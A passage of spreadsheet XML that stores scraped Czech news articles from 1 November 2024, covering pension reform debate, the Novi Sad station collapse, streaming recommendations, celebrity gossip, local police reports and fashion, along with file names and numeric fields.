nárokem na nekrácenou předčasnou penzi už dříve kritizoval nejen Kaňkovský, ale i jihočeský poslanec Šimon Heller. Mluvil o tom i na sjezdu KDU-ČSL, kde neúspěšně kandidoval na předsedu. „Kde máte analýzy, jaký bude mít zvyšování důchodového věku vliv na nemocnost?“ ptala se také v pátek ve Sněmovně Jurečky poslankyně opozičního hnutí SPD Lucie Šafránková . Odpověď ani ona nedostala. Poslanci rozhodují o postupném zvyšování věku odchodu do důchodu až na 67 let Vládní koalice prosazuje postupné zvyšování věku odchodu do důchodu až na 67 let, což má být strop. Nejdříve v tomto věku by do něj měli jít všichni, kdo se narodili v roce 1989 nebo později. ANO i SPD s tím kategoricky nesouhlasí. „Důchodovou reformu, ať chceme nebo nechceme, udělat musíme a nejde to už odkládat dál,“ obhajoval návrh Jurečka . Mluvil i o tom, že se současných penzistů nedotkne. Zmínil, že minimální výše důchodu nebude moci klesnout pod pětinu průměrné mzdy či to, že manželé budou moci mít společný vyměřovací základ pro stanovení důchodu. „Nemít alternativu a říkat – my to změníme – je mlácení prázdné slámy,“ vytýkal Jurečka opozici, která kritizuje vládní návrh. „To není žádná reforma,“ oponoval mu šéf ANO Andrej Babiš. „To je jen zpráva pro lidi, že budou pracovat déle a za méně peněz,“ zopakoval Babiš to, co vládě vytkl už ve středu, kdy začala schůze k důchodové reformě. Babiš prohlásil, že důchodci si zaslouží důstojnou penzi a důstojný život. A že jeho vláda pro ně vždy peníze na penze našla a že to dokáže i znovu. Pro lidi narozené po roce 1965 vládní návrh znamená, že půjdou do penze později Pro lidi, kteří se narodili až po roce 1965, by přijetí návrhu vlády Petra Fialy především znamenalo, že by měli jít do důchodu později. Každý další ročník o měsíc později. Tedy lidí narození v roce 1975 ve věku 65 let a deset měsíců. Každý si to může sám pro sebe lehce spočítat. Zároveň má být skupina lidí s nárokem na odchod do předčasné penze, aniž by jim byla krácena. Lídři stran koalice se dohodla na minimalistické variantě. Na tom, že by měl projít pozměňovací návrh Bendy a Jakoba , aby měli nárok jen lidé pracující ve čtvrté kategorii rizika v profesích, při nichž je vysoké riziko ohrožení zdraví, které nelze zcela vyloučit ani při používání ochranných pomůcek. Vynechat z této možnosti chtějí přes 100 tisíc lidí v profesích ve třetí kategorii rizika kvůli faktorům vibrace, zátěž chladem, zátěž teplem nebo celková fyzická zátěž, jde-li o zátěž při dynamické fyzické práci. „Z údajně promyšlené reformy se tak stal trhací kalendář, na který doplatí zdravotní sestry, montážní dělníci, skláři, pracovníci v lesnictví nebo pracovníci v sociálních službách. Místo původních 130 tisíc lidí by tak dříve do důchodu kvůli náročnosti své práce mohlo jít jen něco přes 10 tisíc,“ kritizuje seškrtání seznamu náročných profesí s nárokem na nekrácenou předčasnou penzi Schillerová . Na dotaz iDNES.cz, zda ANO zkusí jednat s těmi poslanci, kteří řekli, že s osekáním náročných profesí mají problém, odvětila, že její hnutí nikoho individuálně „lanařit“ nebude. Za směšné a za víru v pohádky označila to, že by ještě do konce volebního období mohla vláda připravit a prosadit dodatečné řešení v třetím důchodovém pilíři, které by více než stovce tisíc lidí kompenzovalo, že nebudou moci jít do předčasného důchodu, aniž by jim byl krácen. „Hnutí ANO, bude-li mít k tomu příležitost, veškeré tyto nespravedlivé a unáhlené důchodové změny, které Fialova koalice prosazuje, podrobí kompletní revizi a z velké části zruší,“ prohlásila Schillerová . X X X Vicekrál Donbasu hromadí moc. Tiše řídí celé Rusko , volá si s Elonem Muskem Řídí propagandu, vládne na obsazených ukrajinských územích, diriguje falšovaní voleb. Sergej Kirijenko je klíčovým mužem Kremlu pro domácí politiku, čím dál víc však mluví i do té zahraniční. Spekuluje se, že tento pragmatický intrikán by jednou mohl v čele Ruska vystřídat Vladimira Putina . Před třemi týdny na větry ošlehaném ostrově Šumšu přistál bílý vrtulník, ze kterého vystoupil jeden z nejmocnějších mužů putinovského politického systému. Sergej Kirijenko na nejsevernějším z Kurilských ostrovů oznámil, že Rusko zde vybuduje muzeum na připomínku jejich obsazení v srpnu 1945. „Kirijenkova chapadla omotávají čím dál víc vládní agendy. Dělá vše, aby se stal nepostradatelným kolečkem v soukolí ruské moci,“ hodnotí jeho roli nezávislý novinář Andrej Percev. X X X Zhroucení přístřešku u srbského nádraží si vyžádalo 13 obětí. ‚Nejde o konečný počet,‘ řekl ministr Nejméně třináct lidí, včetně šestiletého dítěte, přišlo o život při zhroucení betonového přístřešku nad vchodem do nádraží ve městě Novi Sad na severu Srbska . Aktualizované údaje uvedl v pátek srbský ministr vnitra Ivica Dačić . Upozornil, že nejde o konečný počet. Ministr zprvu informoval o osmi, později o 11 mrtvých. Nejméně tři další lidé byli hospitalizováni s vážnými zraněními. Záchranářům se po déle než čtyři hodiny trvajícím úsilí podařilo z trosek vyprostit ženu a čtrnáctiletou dívku, uvedl Dačić . Obě zachráněné jsou v kritickém stavu, uvedla podle agentury Reuters šéfka univerzitní nemocnice Vesna Turkulovová. Blic později napsal, že v kritickém stavu jsou osmnáctiletý chlapec a dvě dívky, kterým je 21 a 23 let. „Toto je jeden z nejtěžších dnů v poválečné historii Nového Sadu. Je to hrozná tragédie,“ řekl premiér Miloš Vučević, který se rovněž dostavil na místo neštěstí, kde </t>
  </si>
  <si>
    <t>20</t>
  </si>
  <si>
    <t>39</t>
  </si>
  <si>
    <t>20241101_40_3264825464_37a474267181f21bf197.html</t>
  </si>
  <si>
    <t>37a474267181f21bf197</t>
  </si>
  <si>
    <t>Státní svátek a Dušičky slavili i v Krakovci</t>
  </si>
  <si>
    <t>Státní svátek a Dušičky slavili i v Krakovci Zahrádkářský spolek Nerosteto Krakovec již podruhé pořádal Svíčkový pochod pro odvážné, aneb kdo se bojí nesmí do lesa a bývá v něm malá dušička. Jedná se o pochod pro všechny generace se svíčkami po celé obci. „Během pochodu se zastavujeme u sakrálních staveb v obci, kde zapálíme svíčku, a dozvíme se o její historii. Během cesty se každý dozví i něco z historie obce, i kde dříve stály různé dnes již neexistující stavby. Vydáváme se kolem lesa až ke kapli sv. Antonína Paduánského , nasvícené pouze svícemi," říká předseda spolku Martin Běhal. Poté schází průvod opět do vsi, kde se účastníci občerství čajem nebo svařeným vínem a vrátí se na výchozí bod, kde každý dětský odvážlivec dostane sladké překvapení. Letošní rok se pochodu účastnili kromě místních i lidé přespolní. „Již nyní spolek plánuje 14. prosince v budově zámku v Laškově tradiční Adventní koncert, kterým nás za doprovodu klavíru provede operní sólista, držitel ceny Thálie a ceny Olomouckého kraje Jiří Přibyl . Informace o vstupenkách naleznete na facebookovych stránkách spolku," doplnil za Neroste to předseda Martin Běhal. (Text Martin Běhal, Nerosteto)</t>
  </si>
  <si>
    <t>404</t>
  </si>
  <si>
    <t>20241101_400_3242244850_0523123fb46fa3816c42.html</t>
  </si>
  <si>
    <t>0523123fb46fa3816c42</t>
  </si>
  <si>
    <t>12 parádních novinek na víkend (nejen) z Netflixu</t>
  </si>
  <si>
    <t>12 parádních novinek na víkend (nejen) z Netflixu Foto: Záhadné případy ( Nova ), Hysteria! (Peacock), Lioness ( Paramount +) České novinky v akci. Na obrazovkách ČT se objevil Lovec s Pavlem Křížem , na Nově a Voyo Záhadné případy s Donutilem a také úvod do druhé řady Sex O’Clock. Pak je tu Netflix, který láká na další Diplomatické vztahy nebo drsnou polskou záležitost Do toho, brácho , SkyShowtime na halloweenskou lahůdku Hysteria! a novou sezónu Lioness, a Prime Video na Apokalypsu Z podle úspěšného románu. Apokalypsa Z: Začátek konce | Prime Video horor / drama Příběh sleduje Manela, který po tragické autonehodě, při níž zemřela jeho manželka Julia a on přežil, žije osaměle se svým kocourem. I rok po nehodě se zdá, že se Manel straní světu, a směle ignoruje varování o neznámém viru, který se rychle šíří Španělskem i dalšími zeměmi. Situace nabírá na obrátkách, když Manel souhlasí s tím, že se připojí k rodině své sestry na Kanárských ostrovech. Jeho let je však na poslední chvíli zrušen a letiště ve Vigu zachvátí panika. Krátce poté vláda vyhlašuje stav nouze a uzavírá celý vzdušný prostor. Film Apokalypsa Z: Začátek konce vypráví příběh o přežití, fyzickém i psychickém, a je plný akce, napětí, infekce podobné vzteklině… a mrzutého kocoura. Diplomatické vztahy – 2. řada | Netflix drama / thriller Druhá řada seriálu Diplomat začíná přesně tam, kde skončila první – dramatickou scénou s výbuchem auta na ulici v Londýně , kolem kterého stáli čtyři hlavní postavy. Od té doby, co zkušená diplomatka Kate Wyler (hraje ji Keri Russell ) nastoupila na post velvyslankyně Spojených států ve Spojeném království během krize, se situace jen zhoršuje. Kate, její manipulativní manžel Hal ( Rufus Sewell ) a britský ministr zahraničí Austin Dennison (David Gyasi) se snaží odhalit, kdo stojí za útokem na britskou letadlovou loď. Stopy vedou k možnému vnitřnímu spiknutí, do kterého by mohl být zapleten i premiér Nicol Trowbridge. Po výbuchu končí Hal, zástupce Kate Stuart a další pracovník ambasády v akutní péči v nemocnici, zatímco Kate a šéfka CIA Eidra Park dál rozplétají konspiraci. Domů se nevracej – 1. řada | Netflix horor / sci-fi / mysteriózní Seriál Domů se nevracej je thajský mysteriózní thriller, který kombinuje prvky cestování časem, hororu a dramatu zaměřeného na rodinné vztahy a domácí násilí. V úvodní epizodě se seznámíme s Varee, mladou ženou, která utíká se svou pětiletou dcerou Min do osamělého domu uprostřed lesa, hledajíc útočiště před někým z její minulosti. První epizoda navozuje atmosféru klasického hororu s motivem strašidelného domu, ale příběh brzy nabere nečekaný směr, když se Min ztratí. Do toho, brácho – 1. řada | Netflix drama / krimi Hlavní postava Oskar Gwiazda (Piotr Witkowski) prochází těžkými zkouškami již od prvních minut seriálu. Nedávno byl vyhozen z elitní policejní jednotky po neúspěšné akci, při níž zemřel jeho kolega. Oskar trpí výčitkami svědomí, ale zpočátku si sám není jistý, co se stalo – možná se jednalo o panický záchvat, který ho zcela paralyzoval. Když mu nadřízený vyčítá, že situaci nezvládl, Oskar reaguje agresivně, což jeho vyloučení definitivně potvrzuje. Jeho osobní a profesní život se začíná hroutit. Ani doma však nenachází klid. Jeho otec, který má problémy s alkoholem a hazardem, prohlubuje rodinné potíže. Během hádky s Oskarem dokonce naznačí, že by se měl zabít. Oskar na to s ironií odpoví „směle do toho,“ netuše, že jeho otec tato slova vezme vážně. Když ho najde v garáži plné spalin, je už pozdě. K jeho pocitům viny kvůli smrti kolegy se tak přidává i trauma ze smrti otce. Hudba Johna Williamse | Disney+ dokumentární Režisér Laurent Bouzereau zachycuje rozhovory s Williamsovými kolegy a přáteli, včetně ikonických osobností jako Steven Spielberg , George Lucas , Yo-Yo Ma, Chris Martin , Kathleen Kennedy a Ron Howard , kteří sdílejí své zážitky a obdiv k Williamsově práci. Ve filmu se často setkáváme s Williamsem u jeho klavíru, kde vzpomíná na své hudební začátky jako syn hudebníka, své působení v jazzu i vývoj směrem k filmové hudbě. Dokument prozkoumává jeho tvůrčí metody, inspirace a přístup k hudbě, která definovala celou řadu klasických filmů. Díky Spielbergově spolupráci zahrnuje i dosud nezveřejněné záběry, například Williamsovu práci na tvorbě hudby pro ikonické filmy. Hysteria! – 1. řada | SkyShowtime thriller Děj je zasazen do Michiganu v 80. letech, městečka Happy Hollow, kde zmizení oblíbeného sportovce okamžitě přitáhne pozornost médií. Reportér na místě upozorní na obrácený pentagram namalovaný na domě rodiny pohřešovaného. Město zavane „satanistický“ strach, který cítí snad každý – včetně středoškolské trojice outsiderů: Dylana, Jordyho a Spuda, kteří se snaží prorazit se svou heavy metalovou kapelou Death Krunch. Když Dylan zaslechne poznámku, že „satanisté jsou cool,“ dostane nápad – co kdyby se Death Krunch začali prezentovat jako oddaní satanisté? Spatří v tom příležitost, jak zaujmout a získat fanoušky. Po krátkém přemlouvání Jordy a Spud souhlasí, a tak se trojice vydává na temnou cestu předstíraného satanismu. Lioness – 2. řada | SkyShowtime thriller / drama / akční Mexický kartel překročí hranice Texasu , unese členku Kongresu a zavraždí její rodinu. Joe ( Zoe Saldaña ), agentka pověřená vedením přísně tajného programu Lioness, dostává za úkol infiltrovat nebezpečné domácí teroristické sítě. Joe je pověřena vedením záchranné operace a během vyšetřování zjistí, že do činnosti kartelu mohou být zapojeny i mocnosti jako Rusko a Čína . Pod vedením své nadřízené Kaitlyn Meade ( Nicole Kidman ) a zástupce ředitele CIA Byrona Westfielda (Michael Kelly) začne spolupracovat se státními úřady a zaměří se na vojenskou pilotku ( Genesis Rodriguez ), která má vazby na kartel. První epizoda s názvem „Beware of the Old Soldier“ je hodnocena jako jedna z nejlepších epizod v historii Paramount +. Lovec – 1. řada | iVysílání krimi / thriller Lovec je koprodukční televizní seriál, který přinese osm mysteriózních kriminálních případů s prvky thrilleru. Hlavním tématem příběhu je zlo, démoni mezi námi a boj s nimi. Nalezení a dopadení pachatele je nad možnosti běžných postupů policejního vyšetřování. Případy řeší lovec v podání Pavla Kříže , který pracuje pro tajný řád a udržuje rovnováhu mezi dobrem a zlem. Hlavní ženskou postavu hraje Jana Kolesárová . Lovec režiséra Jiřího Stracha tematicky navazuje na úspěšné minisérie Ďáblova lest, Ztracená brána a seriál Labyrint. Milé laskavosti | PVOD drama / komedie / mysteriózní Film divákům předkládá trojici pozoruhodných příběhů. V prvním z nich se muž, který nemá jinou možnost, pokouší převzít kontrolu nad svým vlastním životem. Ve druhém se setkáváme s policistou, který se znovu shledává se svou ženou, jež se beze stopy ztratila na moři, ale začíná v něm narůstat dojem, že se osoba, která se k němu vrátila, je někým docela jiným. Třetí příběh pak sleduje osudy ženy, odhodlané najít velice konkrétního člověka se zvláštními schopnostmi, kterému je předurčeno stát se výjimečným duchovním vůdcem. Od režiséra Yorgose Lanthimose, jehož výtečné Chudáčky jsme viděli v kinech letos v lednu. Sex O’Clock – 2. řada | Voyo komedie / rodinny Všechno to odstartoval coming out hlavy rodiny, další drobné i větší katastrofy obratem následovaly. Ema ( Sára Korbelová ) sice bude mít miminko, ale to neznamená, že začne být konečně dospělá. Judita ( Petra Bučková ) zkusí začít znova, vyoutovaný Michal ( Jan Révai ) se ocitne ze dne na den bez práce a babička Greta ( Jana Švandová ) nezklame a vytasí se s tajným plánem. K tomu jeden milostný trojúhelník, jedna nová sexy chemikářka a jedna děravá střecha. A samozřejmě Adamova cesta za ztrátou panictví, která se mění v poznání, že mít holku neznamená automaticky šťastný konec, ale je to začátek nové mise, jak si ji udržet. A protože neštěstí nechodí po horách, ale po Anenských, k problémům rozehraným v první sérii přibudou geometrickou řadou další. Záhadné případy – 1. řada | Voyo mysteriózní Seriál Záhadné případy, za jehož vznikem stojí Vratislav Šlajer, Štefan Titka a Andy Fehu, se zaměřuje na záhady a nevysvětlitelné jevy, které zasáhnou životy obyčejných lidí. Miroslav Donutil se ujme role Jaroslava, psychotronika s mimosmyslovými schopnostmi, který se již mnoho let živí jako bylinkář a léčitel. Do svého soukromého pátrání se zapojuje v momentech, kdy běžný lidský rozum nestačí. Připojí se k němu jeho fanoušek Petr (v podání Martina Donutila ), zapálený amatérský badatel do nadpřirozena. Tuto vyšetřovací dvojici doplňuje Jaroslavova dcera Klára (Sára Donutilová), která je racionální protiváhou obou mužů a vede rodinný zásilkový obchod s bylinkami. Znovuzrození | Max thriller / horor Hlavní postavou filmu je Margaret ( Rebecca Hall ), která na první pohled žije úspěšný život – pracuje na prestižní pozici, má perfektní postavu, kterou denně udržuje běháním, a užívá si nenáročného románku s kolegou z práce Peterem ( Michael Esper ), přestože je ženatý. Doma má sedmnáctiletou dceru Abbie (Grace Kaufman), která se chystá na univerzitu. Margaretin život se zdá klidný a šťastný, jenže tento dokonalý obraz se brzy začne rozpadat. První trhliny ve zdánlivě idylickém životě Margaret se objevují v jejím vztahu s Abby . Margaret je totiž výrazně ochranitelská a její tendence kontrolovat dceřin život jsou až nezdravé. Co by mohlo být považováno za běžné chování osamělého rodiče, přerůstá v temnou posedlost poté, co Margaret na konferenci spatří Davida (Tim Roth), muže z její minulosti, jehož výrazné rysi jí okamžitě připomenou staré rány. Margaret si stále více uvědomuje, že David není pouhým přeludem, ale představuje reálnou hrozbu pro ni i její dceru. Od tohoto okamžiku Znovuzrození postupuje klasickou cestou psychologického thrilleru, kde napětí mezi Margaret a Davidem narůstá až do děsivé konfrontace. Čtěte také: Tipy z minulého víkendu – děsivá Grotesquerie, Papežův vymítač s Crowem nebo Shyamalanova Past Autor: Jan Barvíř Autor person Jan Barvíř Rubrika transition_slide Nepřehlédněte</t>
  </si>
  <si>
    <t>9610</t>
  </si>
  <si>
    <t>3020</t>
  </si>
  <si>
    <t>20241101_401_3242260597_977c0d20bc147f709fe9.html</t>
  </si>
  <si>
    <t>977c0d20bc147f709fe9</t>
  </si>
  <si>
    <t>Éterická Linda Rybová: S drsňákem Robertem Kodymem prožila hodně bouřlivé období plné hulení a absence spánku. Začátky vztahu byly dost divoké</t>
  </si>
  <si>
    <t>Éterická Linda Rybová : S drsňákem Robertem Kodymem prožila hodně bouřlivé období plné hulení a absence spánku. Začátky vztahu byly dost divoké Kdo by to byl řekl, že kdysi byla Linda Rybová (49) pořádná divoška. Krásná herečka s tváří éterické víly randila s idolem devadesátých let Robertem Kodymem (57) a na začátku vztahu to měly zamilované hrdličky pořádně divoké. Nekončící večírky, alkohol , opojné látky a mnoho neprospaných nocí. Jak říká samotná Linda, bylo to „vostrý”. Nakonec spolu strávili dlouhých pět let a byla to prý velká láska. Oba ale byli mladí a jejich cesty se pak rozešly jiným směrem. Osobnosti | Ema Ernatová | 1. 11. 2024 Říká se, že, kdo si pamatuje „devadesátky”, ten je neprožil na plné pecky. To Linda rozhodně nemůže říci. Hodně tomu pomohly bouřlivé počátky randění s Robertem Kodymem . Těžko ale mohla čekat, že by vztah s frontmanem kapely Wanastowi Vjecy a členem legendární skupiny Lucie mohl být romantickou procházkou růžovým sadem. Robertovou postelí prošly tisícovky žen Poznali se, když byla Linda čerstvě plnoletá a hudebník byl v tu dobu idolem všech dospívajících dívek i zralých žen. Dlouhovlasý krasavec hrající v úspěšné kapele mohl mít každou, na kterou si ukázal, a samozřejmě toho náležitě využíval. „Ze začátku to byly desítky, pak stovky, tisícovky, no bylo toho moc,“ svěřil Robert se smíchem deníku Blesk s tím, že samozřejmě divoké mejdany byly plné drog a alkoholu . Frontman úspěšné kapely očaroval také krásnou vílu Lindu a ta jeho kouzlu zcela propadla. Bouřlivé období plné hulení Na svou první lásku herečka ráda vzpomíná, byly to pro ni krásné roky, které se z bouřlivého období nakonec proměnily v „rodinný život” dvou pohledných umělců. Úsměv na tváři Lindě obvykle vykouzlí společná fotka se zpěvákem. „Mám na ní dlouhé blond vlasy, Robert dlouhé tmavé vlasy, oba máme na očích zrcadlovky a držíme cigára,“ zavzpomínala Rybová pro časopis Marianne s tím, že je to snímek z jejich úplného začátku rodícího se vztahu. „Tehdy jsme pořád hulili a nespali, vlastně ten začátek trochu vostrej byl,“ smála se Linda s tím, že vlastně bývala hodně velká dračice. Linda na koncertech tančila schovaná v koutku Postupem času ale měli všech večírků dost a chtěli trávit čas jen spolu. Herečce se tak na pár let povedlo zkrotit Robertův divoký temperament. „Nechodili jsme do společnosti, žádné divoké věci se neděly. Robert jezdil hrát na koncerty a já do divadla,“ popsala Linda , která samozřejmě na koncerty „Wanastowek” a zejména Lucie jezdila, ale do rytmu si podupávala v koutku. „Tančila jsem s pocitem trapnosti, že holka Roberta Kodyma tancuje na jeho písničky,“ přiznala Rybová , jež byla pro zpěváka kouzelnou múzou a objevila se také v klipu k písni Andělé. Štěstí našla Rybová u kolegy, který byl v tu dobu ženatý Po pěti letech byl však pohádce konec. Linda ale na muzikanty nezanevřela. Naopak. Vrhla se do náruče talentovaného muzikanta Dana Bárty a randila také s tehdejším vyhlášeným fešákem Janem P. Muchowem. Štěstí ale nakonec našla u kolegy z branže Davida Prachaře (65). Začátky vztahu však nebyly vůbec jednoduché. Rybová byla sice nezadaná, ale herec byl ženatý s Danou Batulkovou . Když se jejich románek provalil, Dana neváhala a mladší kolegyni z divadla prý profackovala. Linda dostávala neskutečně ohavné dopisy od zhrzených žen , které opustil partner, a na herečce nenechaly nit suchou. „Sdělovaly mi, že od nich muž odešel přesně kvůli tomu druhu ženských, jako jsem já. Těch, co vypadají, že neumí do pěti napočítat, a přitom mají všechno spočítané,“ svěřila herečka, která ale toto období naštěstí ustála a s Davidem tvoří jeden z nejstabilnějších párů českého šoubyznysu. Těžko uvěřit, že krásná herečka, která snad nestárne, je trojnásobnou maminkou a díky Davidovu synovi Jakubovi vlastně také babičkou. Spokojeně si žije s Davidem i dětmi , práce má stále dostatek, ať už na divadelních prknech, nebo před televizní kamerou. V herecké branži je vztah kolegyně s kolegou za zády partnerů celkem častý. Věděli jste, že podobně začínal také krásný příběh Petra Štěpánka a Zlaty Adamovské ? Linda s Robert jsou dnes už každý někde jinde Přejít do galerie Zdroj článku Vlasta.cz, Marianne, Autorský článek Doporučená videa z partnerského webu z Lifee.cz : Linda Rybová Robert Kodym láska hulení vztah bouřlivé období Linda byla v mládí velice krásná Foto: Česká televize Rybová má vzhled hollywoodské hvězdy Kodym byl idolem mnoha dívek a žen Robert s kolegou z kapely P.B.CH. Linda je stále aktivní herečkou Linda s partnerem Davidem Prachařem Foto: FTV Prima Autor: Ema Ernatová Autor person Ema Ernatová</t>
  </si>
  <si>
    <t>133570</t>
  </si>
  <si>
    <t>105330</t>
  </si>
  <si>
    <t>20241101_402_3242150854_ef9583ea6f9a6aea8abe.html</t>
  </si>
  <si>
    <t>ef9583ea6f9a6aea8abe</t>
  </si>
  <si>
    <t>Nebezpečná jízda opilého řidiče na Zlínsku : protijedoucí vozidla před ním uhýbala ze silnice Pá 1. 11. 2024 - 08:01 Policie Svůj život i životy dalších lidí riskoval dvaapadesátiletý řidič ze Zlínska , který v úterý ráno usedl za volant, i když těsně před jízdou požil nemalé množství alkoholu . Při jízdě ohrozil všechna protijedoucí vozidla, která kvůli němu musela uhýbat ze silnice, část úseku jel dokonce v protisměru. Jen shodou šťastných okolností se při jeho nebezpečné jízdě nikomu nic nestalo. Oznámení o pravděpodobně opilém řidiči přijali policisté na lince tísňového volání v úterý krátce po sedmé hodině ráno. „ Čtyřiadvacetiletý muž, který jel několik kilometrů za nebezpečně jedoucím řidičem Škody Octavia z Fryštáku směrem do Zlína , sledoval jeho jízdu a informoval o ní policisty, kteří směřovali na místo,“ informovala policejní mluvčí Monika Kozumplíková a dodala, že muž během jízdy ohrozil minimálně čtyři protijedoucí řidiče. Jízda řidiče skončila nárazem do zdi garáže u rodinného domu, kde se snažil zaparkovat. Po příjezdu policistů spal na sedadle řidiče. „ Když ho policisté probudili, dechová zkouška u něj ukázala hodnotu 3,39 promile alkoholu . Přiznal se, že těsně před jízdou vypil nejasné množství tvrdého alkoholu ,“ pokračovala Kozumplíková. Policisté muži zadrželi řidičský průkaz a další jízdu mu zakázali. „ Za ohrožení pod vlivem návykové látky mu v případě odsouzení hrozí trest odnětí svobody až na 3 roky, peněžitý trest a s určitostí teď nějakou dobu řídit nebude,“ dodala policejní mluvčí. Nejsledovanější aktuality</t>
  </si>
  <si>
    <t>835</t>
  </si>
  <si>
    <t>20241101_403_3242137684_d9132b1deef0897a0a43.html</t>
  </si>
  <si>
    <t>d9132b1deef0897a0a43</t>
  </si>
  <si>
    <t>Nové a originální. Tyto kabelky budete chtít nosit už jen kvůli tomu, že je nebude mít nikdo jiný</t>
  </si>
  <si>
    <t>Nové a originální. Tyto kabelky budete chtít nosit už jen kvůli tomu, že je nebude mít nikdo jiný Cindy Kerberová 1. 11. 2024 Na rozdíl od spousty kultovních modelů velkých značek nebudete tyto kabelky potkávat na každém kroku. A v tom tkví jejich kouzlo. Jsou originální, a navíc jejich nákupem podpoříte úžasné módní návrhářky a jejich talentované řemeslníky. O dobré investici nemluvě. Protože skvělých kabelek nikdy není dost. Zip Bag Foto: Litkovska Kabelka Zip Bag, LITKOVSKA Lila Litkovska. Hvězda dnes už evropského formátu se zdá být k nezastavení. Po další přehlídce v rámci oficiálního programu pařížského fashion weeku a spolupráci s legendárním Nickem Knightem představuje novou kabelku, kterou si nelze nezamilovat. Po Big Wine Bag, kožené tašce řešené tak, že se vám do ní vejde vedle laptopu a sluchátek Dyson (a že nejsou malá) ještě celý nákup z místního farmářského trhu, uvádí do nejmenších detailů promyšlený model do práce i na cestování. Její přizpůsobivá ucha na zip umožňují nosit tašku různými způsoby – na rameni, jako psaníčko, nebo dokonce jako batoh. Je jen na vás, jaký styl své Zip Bag dáte. Díky vysoce kvalitní kůži a tvaru s vámi projde čímkoliv. 1 / 5 Foto: Litkovska Mini Yasmin Chain Poprvé se kabelka Yasmin objevila u Vivienne Westwood na podzim roku 1987 coby součást kolekce Time Machine. Návrhářka ji pojmenovala po francouzské návrhářce Yasmine Eslami, s níž během osmdesátek úzce spolupracovala. Tuto sezonu se Yasmin vrací na scénu, ovšem v novém designu a velikosti. Z bohatého archivu značky vychází nejen tvar, ale i potisky v osmi variantách, v nichž si kabelku tuto sezonu můžete pořídit. Mini Yasmin Chain je doplněná robustními cross body řetězem a značka ji představuje v provedení z měkkého mohérového tartanu od Lochcarron of Scotland nebo zářivě růžového, fialového a chartreuse tartanu. Potisk s motivem hadí kůže v limetkově zelené a karamelové odkazuje na původní tenisky Hammer Head z kultovní kolekce Pirate, kterou Vivienne Westwood ohromila svět v sezoně podzim – zima 1981/1982. 1 / 4 Kabelky Mini Yasmin Chain, VIVIENNE WESTWOOD Foto: Vivienne Westwood Josephine Návrhářka Lara Olutunbi, stojící za slow-fashion značkou LarAllan, svými doplňky cílí na zákazníky, kteří vyžadují kvalitu a zároveň dostupnost, protože vycházejí z toho, že taška je pořád jen taška, nikoliv objekt hodný uctívání. Sama se při tvorbě hravých, nepřehlédnutelných kabelek inspiruje vším, co vidí, od nábytku po obrazy. V současné kolekci vyniká zejména jeden model – Josephine inspirovaná vintage kabelkami z 50. let. Kombinací jemné, hladké jehnětiny, potištěné kozí kůže, pozlacených kovových prvků a barevných korálků dosáhla hravě elegantního vzhledu. Vybírat můžete ze čtyř barev, do současného šatníku nejlépe zapadá varianta bordó a karamel. 1 / 3 Kabelka Josephine v bordó kůži, LARALLANE Foto: Larallane</t>
  </si>
  <si>
    <t>20241101_404_3242716951_14c9289d79c337464afe.html</t>
  </si>
  <si>
    <t>14c9289d79c337464afe</t>
  </si>
  <si>
    <t>Dvěma řidičům na padesátce v Plzni naměřili strážníci rychlost 93, respektive 102 km/hod</t>
  </si>
  <si>
    <t>Dvěma řidičům na padesátce v Plzni naměřili strážníci rychlost 93, respektive 102 km/hod Publikováno Od Michaela Hradilová Nejde, nejde, čas vrátit zpátky, tohle se teď jistě honí dvěma řidičům, kteří v sobotu při průjezdu Domažlickou ulicí v Plzni sešlápli plynový pedál víc, než měli. Jeden z nich kolem radaru strážníků prosvištěl rychlostí 93 km/h, ten druhý se „odvázal“ ještě více. Přístroj na displeji radaru ukázal 102 km/h. Následovalo samozřejmě nevyhnutelné setkání s hlídkou městské policie a seznámení s jasnými informacemi o důsledcích rychlé jízdy. V rámci správního řízení mohou oba řidiči totiž očekávat pokutu v rozmezí od 7 do 25 tisíc korun, šestibodový zápis do karty řidiče a zákaz činnosti na dobu 6 až 18 měsíců. Jana Pužmanová MP Plzeň Foto: MP Plzeň Celý článek zde: ZDROJ ZDE …. ✅ REKLAMU ✅ můžete mít zde například formou zpětného odkazu více: Ceny reklamy …. Doporučujeme: Michaela Hradilová 1. 11. 2024 0 Ve středu 30. října před polednem si hlídka píseckých dopravních policistů všimla podezřelého řidiče motocyklu na silnici I/20 na přeložce města. Policisté řidiče zastavovali a […] Michaela Hradilová 4. 11. 2024 0 Více než 1,2 promile alkoholu v dechu, to byl výsledek opakované dechové zkoušky, kterou policisté z českobudějovického oddělení hlídkové služby provedli řidiči, který způsobil ve […] Michaela Hradilová 28. 10. 2024 0 Jihlavští policisté prověřují od nedělního rána případ poškození sdílených jízdních kol v Jihlavě . Oznámení policisté přijali 27. října, krátce po deváté hodině ranní, na tísňové […] Vaše zpětné odkazy Zobrazení počtu sledujících na Facebook stránce Deník Pravda Sdílet obsah je povoleno s uvedením odkazu.Nabízíme reklamní bannery, odkazy, PR a SEO články. Ceník naleznete zde: (klik) Politológ Láštic u Braňa Závodského: Bezpečnosť Európy je garantovaná USA . Preto nie je jedno, kto je v Bielom dome 5. 11. 2024 Informace pro Vás zabezpečeno od thsecurity.cz. Spravovat Souhlas s cookies Abychom poskytli co nejlepší služby, používáme k ukládání a/nebo přístupu k informacím o zařízení, technologie jako jsou soubory cookies. Funkční Vždy aktivní Technické uložení nebo přístup je nezbytně nutný pro legitimní účel umožnění použití konkrétní služby, kterou si odběratel nebo uživatel výslovně vyžádal, nebo pouze za účelem provedení přenosu sdělení prostřednictvím sítě elektronických komunikací. Předvolby Technické uložení nebo přístup je nezbytný pro legitimní účel ukládání preferencí, které nejsou požadovány odběratelem nebo uživatelem. Statistiky Technické uložení nebo přístup, který se používá výhradně pro statistické účely. Technické uložení nebo přístup, který se používá výhradně pro anonymní statistické účely. Bez předvolání, dobrovolného plnění ze strany vašeho Poskytovatele internetových služeb nebo dalších záznamů od třetí strany nelze informace, uložené nebo získané pouze pro tento účel, obvykle použít k vaší identifikaci. Marketing Technické uložení nebo přístup je nutný k vytvoření uživatelských profilů za účelem zasílání reklamy nebo sledování uživatele na webových stránkách nebo několika webových stránkách pro podobné marketingové účely. Autor: Jana Pužmanová, Michaela Hradilová Autoři person Jana Pužmanová person Michaela Hradilová</t>
  </si>
  <si>
    <t>20241101_405_3386165167_fd45684f432d804f99f7.html</t>
  </si>
  <si>
    <t>fd45684f432d804f99f7</t>
  </si>
  <si>
    <t>Kam o víkendu: Festival papíru, otevřené zahrady nebo lyžování v Praze</t>
  </si>
  <si>
